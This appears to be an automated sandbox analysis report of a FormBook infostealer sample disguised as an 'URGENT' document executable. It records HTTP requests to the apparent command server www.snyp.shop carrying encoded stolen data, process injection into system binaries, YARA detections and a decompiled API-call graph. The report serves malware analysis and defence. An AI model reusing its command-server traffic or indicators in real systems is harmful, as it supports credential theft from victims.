                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.snyp.shop
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1251
                                                      Referer: http://www.snyp.shop/4nyz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 77 51 6a 46 38 54 52 71 2f 44 43 6f 79 51 78 5a 67 79 59 68 55 49 4b 36 70 55 4d 7a 62 72 49 64 39 57 42 55 64 71 65 58 4a 62 47 48 38 64 68 50 33 4f 45 70 52 46 37 44 45 53 62 78 79 58 57 4a 66 76 5a 2b 4e 32 31 76 67 6d 5a 65 32 34 78 48 5a 66 70 4b 33 53 55 53 6c 36 56 59 4e 48 36 41 70 4b 6f 61 37 6f 37 57 44 38 72 74 69 4d 38 4d 2b 75 4a 4e 72 2f 6e 30 46 46 4f 6c 31 59 53 56 5a 69 75 33 32 57 32 2b 4e 66 2b 4e 31 57 7a 78 55 4a 39 33 78 63 68 49 72 6a 71 6c 44 74 46 53 55 44 47 49 44 35 68 5a 4f 45 4b 35 67 31 48 6b 33 6d 34 6e 34 45 65 4a 62 44 6b 4d 78 69 30 6d 41 30 30 32 39 77 39 46 6f 2b 74 37 77 78 35 43 55 48 4b 55 33 39 7a 70 6c 69 31 6c 57 57 30 74 2f 56 46 64 5a 4a 4f 34 6a 35 42 48 4b 4f 74 45 36 4f 51 50 2f 47 54 56 44 73 75 56 53 62 71 6f 43 33 64 6c 78 50 69 63 53 33 54 62 5a 65 6a 69 55 38 61 67 6d 41 65 2f 62 48 4f 64 4c 63 78 4c 61 [TRUNCATED]
                                                      Data Ascii: 66Sxjp=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/wQjF8TRq/DCoyQxZgyYhUIK6pUMzbrId9WBUdqeXJbGH8dhP3OEpRF7DESbxyXWJfvZ+N21vgmZe24xHZfpK3SUSl6VYNH6ApKoa7o7WD8rtiM8M+uJNr/n0FFOl1YSVZiu32W2+Nf+N1WzxUJ93xchIrjqlDtFSUDGID5hZOEK5g1Hk3m4n4EeJbDkMxi0mA0029w9Fo+t7wx5CUHKU39zpli1lWW0t/VFdZJO4j5BHKOtE6OQP/GTVDsuVSbqoC3dlxPicS3TbZejiU8agmAe/bHOdLcxLaYVCe+t2+8WmTTWxkOLxC83/rm2nRrtlZ1R9j+uNpsVxU5alnFq82dJjBA0fz/yIxv1nd9MjDTQUa4xlSB4Azkf/40Cu+RYuIgLdIcngwNaOw6drWkg46g2TeuSBlMCQMUE9/Gl5BTANgUAm9Gagr5nBWzfEm2yAYIshqVoAfmrplGe/ZzPbrOD3vv0YKZdV9tE8J8UnCFj8jhuofazMutg2L5WoIGxwDq5loS/Nln+zcxHuoNHgUaDehbviPHQil0Xoml0A7V+zaUZ5Lkrhbpc+p/8KC1244di+MMZuMil8HWxRjL+2JVnrbMfczoimDZhSxl2vOgHJrl50JcUW0Ro2al7vhW9B24jwMZg31UyTzl44NZTom9hgmRTV9T3dazR1ZYHtYQjPtDhVZuBW8U4xVD7AmoUBcGlUu6jge31+X6R5VUIfcrZANc9BborUBTWvp3p0Xi/GV2GA6Zi3Yb6z+FgNnLg+reQI7UJEwf7edVr6py/g6XMuSKZVEBgv7bNOkMhAP5pMwijpTvnJybO/dCgS76cUgQXKYEhlF/TAp54ujgizgMHiKkEZibQvow2s1Z/U0c48q4eBJqJ9LC1fY+3hNDMdQ/4v9mxPOw2vYPjlNTjR27kJ4Mj9Iwwo833Yx2XW4N4pdjbe3sHz3YFuiUbDn6ZoQJJ [TRUNCATED]
                                                      Dec 10, 2024 18:01:04.487437010 CET73INHTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.74995213.248.169.4880564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:01:05.939208031 CET532OUTGET /4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE HTTP/1.1
                                                      Host: www.snyp.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Dec 10, 2024 18:01:07.031958103 CET399INHTTP/1.1 200 OK
                                                      content-type: text/html
                                                      date: Tue, 10 Dec 2024 17:01:06 GMT
                                                      content-length: 278
                                                      connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 36 53 78 6a 70 3d 62 63 4d 2f 4a 51 2f 45 46 77 46 57 59 51 67 74 54 4f 4f 53 33 35 72 71 6f 46 4d 64 76 69 65 67 54 4a 4b 6d 78 49 70 4a 6f 66 68 46 6b 79 4a 4d 52 70 54 55 47 74 43 39 31 5a 55 50 5a 52 4d 62 55 62 4e 4b 58 42 65 48 41 70 4e 73 41 58 4a 2b 4f 48 74 4c 66 41 56 67 6e 65 33 66 44 50 4e 5a 79 41 38 6a 66 57 71 32 64 61 37 55 54 34 35 71 30 66 77 31 62 38 53 58 38 48 31 65 2f 4c 6e 72 63 52 46 6c 58 39 6f 6d 32 68 52 6f 26 50 4e 45 3d 65 30 52 50 52 66 34 48 56 4e 45 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE"}</script></head></html>


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:11:59:02
                                                      Start date:10/12/2024
                                                      Path:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
                                                      Imagebase:0x400000
                                                      File size:1'762'304 bytes
                                                      MD5 hash:B5C0BC1CA5223C4B18328235497A2EF6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:11:59:03
                                                      Start date:10/12/2024
                                                      Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                      Imagebase:0x400000
                                                      File size:1'658'880 bytes
                                                      MD5 hash:A7B2833265E5E73E4BC1B1899D393D76
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:3
                                                      Start time:11:59:03
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\alg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\alg.exe
                                                      Imagebase:0x140000000
                                                      File size:1'594'368 bytes
                                                      MD5 hash:114ADFAB8A4E69539FC98ABAB86561C6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:4
                                                      Start time:11:59:03
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
                                                      Imagebase:0xba0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:11:59:05
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                      Wow64 process (32bit):
                                                      Commandline:
                                                      Imagebase:
                                                      File size:138'056 bytes
                                                      MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                      Has elevated privileges:
                                                      Has administrator privileges:
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:9
                                                      Start time:11:59:05
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                      Wow64 process (32bit):
                                                      Commandline:
                                                      Imagebase:
                                                      File size:174'408 bytes
                                                      MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                      Has elevated privileges:
                                                      Has administrator privileges:
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:10
                                                      Start time:11:59:05
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                      Wow64 process (32bit):
                                                      Commandline:
                                                      Imagebase:
                                                      File size:154'952 bytes
                                                      MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                      Has elevated privileges:
                                                      Has administrator privileges:
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:11
                                                      Start time:11:59:05
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\AppVClient.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\AppVClient.exe
                                                      Imagebase:0x140000000
                                                      File size:1'348'608 bytes
                                                      MD5 hash:70844A25E3B4375DA206E6793BBE1975
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:13:33:36
                                                      Start date:10/12/2024
                                                      Path:C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe"
                                                      Imagebase:0x30000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:17
                                                      Start time:13:33:41
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\choice.exe"
                                                      Imagebase:0x310000
                                                      File size:28'160 bytes
                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:18
                                                      Start time:13:33:53
                                                      Start date:10/12/2024
                                                      Path:C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe"
                                                      Imagebase:0x30000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:22
                                                      Start time:13:34:06
                                                      Start date:10/12/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff722870000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.9%
                                                        Dynamic/Decrypted Code Coverage:6.6%
                                                        Signature Coverage:8.9%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:55
                                                        execution_graph 108628 441de4 GetTempPathW 108629 441e01 108628->108629 108629->108629 108630 1675085 108631 167506f 108630->108631 108632 1675089 108630->108632 108635 1698550 108631->108635 108634 1675078 108637 1698556 108635->108637 108636 1698145 GetLastError 108642 1697d37 108636->108642 108658 1697dd7 108636->108658 108637->108635 108637->108636 108638 1698bc1 GetLastError 108637->108638 108639 1698986 SetEntriesInAclW 108637->108639 108637->108642 108643 16989cd OpenMutexW 108637->108643 108648 1698599 108637->108648 108649 1697d20 108637->108649 108651 169896a wsprintfW 108637->108651 108653 1698953 AllocateAndInitializeSid 108637->108653 108654 1697d30 108637->108654 108657 169890b LocalFree 108637->108657 108637->108658 108638->108637 108639->108637 108640 1698209 GetUserNameW 108640->108642 108640->108658 108641 16983fb GetUserNameW 108641->108658 108642->108634 108643->108634 108645 169824a GetLastError 108645->108634 108645->108658 108646 1697d6c GetVolumeInformationW 108646->108634 108647 169836e GetLastError 108647->108658 108648->108651 108648->108654 108649->108642 108649->108646 108650 1697d83 GetWindowsDirectoryW 108649->108650 108649->108654 108655 1697e06 GetComputerNameW 108649->108655 108650->108642 108650->108654 108651->108654 108652 1697fd4 GetLastError 108652->108658 108653->108637 108654->108642 108654->108646 108655->108642 108656 1697f6b GetVolumeInformationW 108656->108658 108657->108637 108658->108636 108658->108640 108658->108641 108658->108642 108658->108645 108658->108646 108658->108647 108658->108649 108658->108652 108658->108654 108658->108656 108659 43fe27 108672 41f944 108659->108672 108661 43fe3d 108662 43fe53 108661->108662 108663 43febe 108661->108663 108761 409e5d 60 API calls 108662->108761 108681 40fce0 108663->108681 108665 43fe92 108667 44089c 108665->108667 108668 43fe9a 108665->108668 108763 469e4a 89 API calls 4 library calls 108667->108763 108762 46834f 59 API calls Mailbox 108668->108762 108671 43feb2 Mailbox 108673 41f950 108672->108673 108674 41f962 108672->108674 108764 409d3c 60 API calls Mailbox 108673->108764 108676 41f991 108674->108676 108677 41f968 108674->108677 108775 409d3c 60 API calls Mailbox 108676->108775 108765 420db6 108677->108765 108680 41f95a 108680->108661 108804 408180 108681->108804 108683 40fd3d 108684 44472d 108683->108684 108730 4106f6 108683->108730 108809 40f234 108683->108809 108927 469e4a 89 API calls 4 library calls 108684->108927 108688 444742 108689 44488d 108689->108688 108697 40fe4c 108689->108697 108933 47a2d9 85 API calls Mailbox 108689->108933 108690 40fe3e 108690->108689 108690->108697 108931 4566ec 59 API calls 2 library calls 108690->108931 108691 410517 108701 420db6 Mailbox 59 API calls 108691->108701 108692 444b53 108692->108688 108952 469e4a 89 API calls 4 library calls 108692->108952 108694 420db6 59 API calls Mailbox 108723 40fdd3 108694->108723 108696 4447d7 108696->108688 108929 469e4a 89 API calls 4 library calls 108696->108929 108697->108692 108702 4448f9 108697->108702 108813 40837c 108697->108813 108698 444848 108932 4560ef 59 API calls 2 library calls 108698->108932 108709 410545 _memmove 108701->108709 108710 444917 108702->108710 108935 4085c0 59 API calls Mailbox 108702->108935 108705 444755 108705->108696 108928 40f6a3 341 API calls 108705->108928 108707 4448b2 Mailbox 108707->108697 108934 4566ec 59 API calls 2 library calls 108707->108934 108716 420db6 Mailbox 59 API calls 108709->108716 108713 444928 108710->108713 108936 4085c0 59 API calls Mailbox 108710->108936 108711 40fea4 108719 444ad6 108711->108719 108720 40ff32 108711->108720 108739 410179 Mailbox _memmove 108711->108739 108712 44486b 108714 409ea0 341 API calls 108712->108714 108713->108739 108937 4560ab 59 API calls Mailbox 108713->108937 108714->108689 108745 410106 _memmove 108716->108745 108946 469ae7 60 API calls 108719->108946 108721 420db6 Mailbox 59 API calls 108720->108721 108726 40ff39 108721->108726 108723->108688 108723->108690 108723->108691 108723->108694 108723->108705 108723->108709 108736 44480c 108723->108736 108901 409ea0 108723->108901 108726->108730 108820 4109d0 108726->108820 108727 409ea0 341 API calls 108728 444a87 108727->108728 108728->108688 108941 4084c0 108728->108941 108926 469e4a 89 API calls 4 library calls 108730->108926 108732 40ffb2 108732->108709 108732->108730 108740 40ffe6 108732->108740 108930 469e4a 89 API calls 4 library calls 108736->108930 108737 444ab2 108945 469e4a 89 API calls 4 library calls 108737->108945 108739->108730 108739->108737 108747 410398 108739->108747 108748 420db6 59 API calls Mailbox 108739->108748 108754 444a1c 108739->108754 108759 444a4d 108739->108759 108899 408740 68 API calls __cinit 108739->108899 108900 408660 68 API calls 108739->108900 108938 465937 68 API calls 108739->108938 108939 4089b3 69 API calls Mailbox 108739->108939 108940 409d3c 60 API calls Mailbox 108739->108940 108746 410007 108740->108746 108947 408047 108740->108947 108745->108739 108760 410162 108745->108760 108925 409c90 59 API calls Mailbox 108745->108925 108746->108730 108749 444b24 108746->108749 108751 41004c 108746->108751 108747->108671 108748->108739 108951 409d3c 60 API calls Mailbox 108749->108951 108751->108692 108751->108730 108752 4100d8 108751->108752 108897 409d3c 60 API calls Mailbox 108752->108897 108757 420db6 Mailbox 59 API calls 108754->108757 108755 4100eb 108755->108730 108898 4082df 59 API calls Mailbox 108755->108898 108757->108759 108759->108727 108760->108671 108761->108665 108762->108671 108763->108671 108764->108680 108768 420dbe 108765->108768 108767 420dd8 108767->108680 108768->108767 108770 420ddc std::exception::exception 108768->108770 108776 42571c 108768->108776 108793 4233a1 DecodePointer 108768->108793 108794 42859b RaiseException 108770->108794 108772 420e06 108795 4284d1 58 API calls _free 108772->108795 108774 420e18 108774->108680 108775->108680 108777 425797 108776->108777 108781 425728 108776->108781 108802 4233a1 DecodePointer 108777->108802 108779 42579d 108803 428b28 58 API calls __getptd_noexit 108779->108803 108783 425733 108781->108783 108784 42575b RtlAllocateHeap 108781->108784 108787 425783 108781->108787 108791 425781 108781->108791 108799 4233a1 DecodePointer 108781->108799 108783->108781 108796 42a16b 58 API calls __NMSG_WRITE 108783->108796 108797 42a1c8 58 API calls 6 library calls 108783->108797 108798 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108783->108798 108784->108781 108785 42578f 108784->108785 108785->108768 108800 428b28 58 API calls __getptd_noexit 108787->108800 108801 428b28 58 API calls __getptd_noexit 108791->108801 108793->108768 108794->108772 108795->108774 108796->108783 108797->108783 108799->108781 108800->108791 108801->108785 108802->108779 108803->108785 108805 40818f 108804->108805 108808 4081aa 108804->108808 108953 407e4f 108805->108953 108807 408197 CharUpperBuffW 108807->108808 108808->108683 108810 40f251 108809->108810 108811 40f272 108810->108811 108957 469e4a 89 API calls 4 library calls 108810->108957 108811->108723 108814 40838d 108813->108814 108815 43edbd 108813->108815 108816 420db6 Mailbox 59 API calls 108814->108816 108817 408394 108816->108817 108818 4083b5 108817->108818 108958 408634 59 API calls Mailbox 108817->108958 108818->108702 108818->108711 108821 444cc3 108820->108821 108835 4109f5 108820->108835 109022 469e4a 89 API calls 4 library calls 108821->109022 108823 410cfa 108823->108732 108825 410ee4 108825->108823 108827 410ef1 108825->108827 109020 411093 341 API calls Mailbox 108827->109020 108828 410a4b PeekMessageW 108895 410a05 Mailbox 108828->108895 108830 410ef8 LockWindowUpdate DestroyWindow GetMessageW 108830->108823 108833 410f2a 108830->108833 108832 444e81 Sleep 108832->108895 108837 445c58 TranslateMessage DispatchMessageW GetMessageW 108833->108837 108834 410ce4 108834->108823 109019 411070 10 API calls Mailbox 108834->109019 108835->108895 109023 409e5d 60 API calls 108835->109023 109024 456349 341 API calls 108835->109024 108837->108837 108838 445c88 108837->108838 108838->108823 108839 410e43 PeekMessageW 108839->108895 108840 410ea5 TranslateMessage DispatchMessageW 108840->108839 108841 444d50 TranslateAcceleratorW 108841->108839 108841->108895 108842 409e5d 60 API calls 108842->108895 108843 410d13 timeGetTime 108843->108895 108844 44581f WaitForSingleObject 108846 44583c GetExitCodeProcess CloseHandle 108844->108846 108844->108895 108879 410f95 108846->108879 108847 410e5f Sleep 108881 410e70 Mailbox 108847->108881 108848 408047 59 API calls 108848->108895 108851 420db6 59 API calls Mailbox 108851->108895 108852 445af8 Sleep 108852->108881 108854 42049f timeGetTime 108854->108881 108855 410f4e timeGetTime 109021 409e5d 60 API calls 108855->109021 108858 445b8f GetExitCodeProcess 108860 445ba5 WaitForSingleObject 108858->108860 108861 445bbb CloseHandle 108858->108861 108860->108861 108860->108895 108861->108881 108864 485f25 110 API calls 108864->108881 108865 40b7dd 109 API calls 108865->108881 108866 445874 108866->108879 108867 445c17 Sleep 108867->108895 108868 445078 Sleep 108868->108895 108875 409ea0 314 API calls 108875->108895 108877 40fce0 314 API calls 108877->108895 108879->108732 108881->108854 108881->108858 108881->108864 108881->108865 108881->108866 108881->108867 108881->108868 108881->108879 108881->108895 109049 407667 108881->109049 109054 462408 60 API calls 108881->109054 109055 409e5d 60 API calls 108881->109055 109056 407de1 108881->109056 109060 4089b3 69 API calls Mailbox 108881->109060 109061 40b73c 341 API calls 108881->109061 109062 4564da 60 API calls 108881->109062 109063 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108881->109063 109064 463c55 66 API calls Mailbox 108881->109064 108882 469e4a 89 API calls 108882->108895 108884 4084c0 69 API calls 108884->108895 108885 4089b3 69 API calls 108885->108895 108886 409c90 59 API calls Mailbox 108886->108895 108887 45617e 59 API calls Mailbox 108887->108895 108889 407de1 59 API calls 108889->108895 108890 4455d5 VariantClear 108890->108895 108891 456e8f 59 API calls 108891->108895 108892 44566b VariantClear 108892->108895 108893 408cd4 59 API calls Mailbox 108893->108895 108894 445419 VariantClear 108894->108895 108895->108828 108895->108832 108895->108834 108895->108839 108895->108840 108895->108841 108895->108842 108895->108843 108895->108844 108895->108847 108895->108848 108895->108851 108895->108852 108895->108855 108895->108875 108895->108877 108895->108879 108895->108881 108895->108882 108895->108884 108895->108885 108895->108886 108895->108887 108895->108889 108895->108890 108895->108891 108895->108892 108895->108893 108895->108894 108896 40b73c 314 API calls 108895->108896 108959 40e420 108895->108959 108966 40e6a0 108895->108966 108997 40f460 108895->108997 109018 4031ce IsDialogMessageW GetClassLongW 108895->109018 109025 486018 59 API calls 108895->109025 109026 469a15 59 API calls Mailbox 108895->109026 109027 45d4f2 59 API calls 108895->109027 109028 409837 108895->109028 109046 4560ef 59 API calls 2 library calls 108895->109046 109047 408401 59 API calls 108895->109047 109048 4082df 59 API calls Mailbox 108895->109048 108896->108895 108897->108755 108898->108745 108899->108739 108900->108739 108902 409ebf 108901->108902 108920 409eed Mailbox 108901->108920 108903 420db6 Mailbox 59 API calls 108902->108903 108903->108920 108904 40b475 108905 408047 59 API calls 108904->108905 108919 40a057 108905->108919 108906 456e8f 59 API calls 108906->108920 108907 40b47a 108908 440055 108907->108908 108923 4409e5 108907->108923 110567 469e4a 89 API calls 4 library calls 108908->110567 108909 407667 59 API calls 108909->108920 108911 420db6 59 API calls Mailbox 108911->108920 108914 422d40 67 API calls __cinit 108914->108920 108915 440064 108915->108723 108918 408047 59 API calls 108918->108920 108919->108723 108920->108904 108920->108906 108920->108907 108920->108908 108920->108909 108920->108911 108920->108914 108920->108918 108920->108919 108921 4409d6 108920->108921 108924 40a55a 108920->108924 110565 40c8c0 341 API calls 2 library calls 108920->110565 110566 40b900 60 API calls Mailbox 108920->110566 110569 469e4a 89 API calls 4 library calls 108921->110569 110570 469e4a 89 API calls 4 library calls 108923->110570 110568 469e4a 89 API calls 4 library calls 108924->110568 108925->108745 108926->108684 108927->108688 108928->108696 108929->108688 108930->108688 108931->108698 108932->108712 108933->108707 108934->108707 108935->108710 108936->108713 108937->108739 108938->108739 108939->108739 108940->108739 108943 4084cb 108941->108943 108942 4084f2 108942->108737 108943->108942 110571 4089b3 69 API calls Mailbox 108943->110571 108945->108688 108946->108740 108948 408052 108947->108948 108949 40805a 108947->108949 108950 407f77 59 API calls 108948->108950 108949->108746 108950->108949 108951->108692 108952->108688 108954 407e62 108953->108954 108956 407e5f _memmove 108953->108956 108955 420db6 Mailbox 59 API calls 108954->108955 108955->108956 108956->108807 108957->108811 108958->108818 108960 40e451 108959->108960 108961 40e43d 108959->108961 109066 469e4a 89 API calls 4 library calls 108960->109066 109065 40df00 341 API calls 2 library calls 108961->109065 108963 40e448 108963->108895 108965 443aa4 108965->108965 108967 40e6d5 108966->108967 108968 443aa9 108967->108968 108971 40e73f 108967->108971 108979 40e799 108967->108979 108969 409ea0 341 API calls 108968->108969 108970 443abe 108969->108970 108996 40e970 Mailbox 108970->108996 109071 469e4a 89 API calls 4 library calls 108970->109071 108974 407667 59 API calls 108971->108974 108971->108979 108972 407667 59 API calls 108972->108979 108976 443b04 108974->108976 108975 422d40 __cinit 67 API calls 108975->108979 109072 422d40 108976->109072 108977 443b26 108977->108895 108979->108972 108979->108975 108979->108977 108981 40e95a 108979->108981 108979->108996 108980 4084c0 69 API calls 108980->108996 108981->108996 109075 469e4a 89 API calls 4 library calls 108981->109075 108983 408d40 59 API calls 108983->108996 108984 409ea0 341 API calls 108984->108996 108988 469e4a 89 API calls 108988->108996 108993 40f195 109079 469e4a 89 API calls 4 library calls 108993->109079 108994 443e25 108994->108895 108995 40ea78 108995->108895 108996->108980 108996->108983 108996->108984 108996->108988 108996->108993 108996->108995 109067 407f77 108996->109067 109076 456e8f 59 API calls 108996->109076 109077 47c5c3 341 API calls 108996->109077 109078 47b53c 341 API calls Mailbox 108996->109078 109080 409c90 59 API calls Mailbox 108996->109080 109081 4793c6 341 API calls Mailbox 108996->109081 108998 40f650 108997->108998 108999 40f4ba 108997->108999 109002 407de1 